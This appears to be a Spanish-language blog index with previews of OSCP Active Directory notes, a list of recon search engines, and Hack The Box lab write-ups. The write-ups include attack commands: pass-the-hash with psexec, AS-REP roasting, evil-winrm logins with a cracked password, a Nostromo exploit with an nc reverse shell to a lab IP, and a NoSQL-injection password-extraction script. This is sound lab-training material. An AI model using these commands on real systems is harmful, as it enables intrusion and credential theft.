Apuntes de mi preparación para la certificación OSCP (Active Directory)

Active Directory: Para este tema en particular estaré usando la máquina Forest de Hack The Box, en la ejecución de varias técnicas que permitirán comprometer un AD. Estas técnicas no necesariamente son aplicadas en la resolución de la máquina.  Máquina de Práctica: Forest de Hack the Box.  Acceso: psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected] Obtención de Información de la manera tradicional: net usernet user /domainnet user moyapj /domainnet groupnet group /domain Obtención de información con PowerShell Obtener Información del Dominio: PS C:\Windows\system32> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() Con el uso de herramientas: Powerview.ps1 Esta herramienta se puede descargar de aquí. Es parte de todas las herramientas…

Motores de búsqueda para bug hunters y red teamers.

Es una práctica muy útil analizar el segmento de nuestra empresa desde buscadores como estos, ya que nos permitirá identificar fallos, vulnerabilidades y malas configuraciones relacionados con la publicación de servicios al internet. A continuación una lista de buscadores para bug hunters o red teamers. https://censys.io https://www.shodan.io https://viz.greynoise.io/table https://zoomeye.org https://fofa.so https://app.binaryedge.io https://hunter.io https://wigle.net https://ghostproject.fr https://grep.app https://crt.sh

Writeup Obscurity Hack the Box

Punto de Apoyo Incial nmap -p- -T5 –open obscurity.htb Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT     STATE SERVICE 22/tcp   open  ssh 8080/tcp open  http-proxy Nmap done: 1 IP address (1 host up) scanned in 164.29 seconds nmap -sV -sC -p 8080 obscurity.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 19:24 -05 Nmap scan report for obscurity.htb (10.10.10.168) Host is up (0.18s latency). PORT     STATE SERVICE    VERSION 8080/tcp open  http-proxy BadHTTPServer | fingerprint-strings:  |   GetRequest, HTTPOptions:  |     HTTP/1.1 200 OK |     Date: Mon, 02 Dec 2019 00:24:06 |     Server: BadHTTPServer |     Last-Modified: Mon, 02 Dec…

Writeup Openadmin Hack the Box

Resumen: Explotando una vulnerabilidad de OpenNetAdmin se pudo obtener ejecución de comando en la máquina. Con este acceso se obtuvo credenciales de la base de datos, y por re uso de credenciales se pudo acceder al equipo por ssh, con este acceso se pudo ver una llave privada y acceder con un segundo usuario. Para terminar con el uso de gtfobins se escala privilegios. Punto de apoyo inicial Enumeramos de manera habitual, y se encuentra la aplicación OpenNetAdmin 18.1.1: http://openadmin.htb/ona/ Una vulnerabilidad en este software es explotable: https://www.exploit-db.com/exploits/47691 Obteniendo el usuario (1/2) Con el acceso que se obtuvo explotando la…

Writeup Traverxec Hack The Box

Encontrando el user Todo empezó con un con una enumeración básica, y se determinó que la máquina Traverxec tiene abierto dos puertos. El 22 (ssh) y el 80 (http), de acuerdo a la salida de nmap, se puede ver que el puerto 80 tiene el servicio de http de nostromo en su versión 1.9.6. <service name=»http» product=»nostromo» version=»1.9.6″ Con esa información y con este enlace se estableció una shell reversa. https://github.com/jas502n/CVE-2019-16278 ./CVE-2019-16278.sh traverxec.htb 80 nc -nv 10.10.14.3 4444 -c bash Nostromo, permite a los usuarios tener páginas personales, por lo que revisando «david/public_www/protected-file-area», se pudo encontrar una la id_rsa en…

Writeup Forest Hack the Box

Nmap a forest.htb de la manera convencional. Enumerar usuarios como indica aquí. https://www.tarlogic.com/blog/como-atacar-kerberos/ O con el módulo smb-enum de metasploit. Con el resultado de nombres de usuario se elaboró el archivo username.txt. Se encontró el usuario svc-alfresco y se pudo determinar el hash de la credencial con el comando python GetNPUsers.py htb.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast Una vez obtenido el hash de svc-alfresco. Con el uso de hashcat y Rockyou.txt se determinó que la clave de svc-alfresco es «s3rvice» Se obtuvo la shell en el servidor con el comando: evil-winrm -i forest.htb -u svc-alfresco -p ‘s3rvice’ Y en…

Writeup Mango Hack the Box

Mango = MongoDB Revisar los certificados SSL y encontrar el nombre del host adecuado: https://staging-order.mango.htb Revisar el link https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection Elaborar un script para explotar NoSQLi #!/usr/bin/env python   import requests   import string   url = «http://staging-order.mango.htb/index.php»   headers = {«Host»: «staging-order.mango.htb»}   cookies = {«PHPSESSID»: «9k6j39np56td4vq3q4lg4eh95j»}   possible_chars = list(string.ascii_letters) + list(string.digits) + [«\\»+c for c in string.punctuation+string.whitespace ]   def get_password(username):       print(«Extracting password of » + username)       params = {«username»:username, «password[$regex]»:»», «login»: «login»}       password = «^»       while True:           for c in…